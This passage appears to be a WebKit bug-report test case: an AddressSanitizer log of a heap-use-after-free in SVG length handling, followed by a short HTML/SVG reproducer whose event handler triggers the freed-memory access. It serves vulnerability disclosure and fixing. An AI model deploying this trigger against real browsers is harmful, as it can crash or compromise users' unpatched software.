SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f) in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper()
Shadow bytes around the buggy address:
0x1c180001b940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c180001b950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c180001b960: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c180001b970: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c180001b980: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x1c180001b990: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
0x1c180001b9a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c180001b9b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c180001b9c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c180001b9d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c180001b9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==50494==ABORTING
-->
<script>
function eventhandler1() {
var x = svgvar00003.x.animVal.getItem(0);
svgvar00020.beginElement();
}
</script>
<svg>
<text x="1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1" id="svgvar00003">
<set id="svgvar00020" attributeName="x" to="100" onbegin="eventhandler1()" />